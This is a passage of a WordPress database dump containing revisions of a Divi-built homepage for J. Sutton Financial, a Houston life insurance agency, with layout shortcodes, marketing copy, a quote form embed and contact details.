background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:11:14','2023-04-08 21:11:14','',138,'http://cmdev-site1.com/?p=856',0,'revision','',0),(859,1,'2023-04-08 21:14:43','2023-04-08 21:14:43','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px|false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:14:43','2023-04-08 21:14:43','',138,'http://cmdev-site1.com/?p=859',0,'revision','',0),(858,1,'2023-04-08 21:13:33','2023-04-08 21:13:33','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin_last_edited=\"on|desktop\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||150px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|150px|||false|false\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px|false|false\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin_last_edited=\"on|phone\" sticky_enabled=\"0\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_tablet=\"|37px||89px|false|false\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:13:33','2023-04-08 21:13:33','',138,'http://cmdev-site1.com/?p=858',0,'revision','',0),(860,1,'2023-04-08 21:15:24','2023-04-08 21:15:24','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" 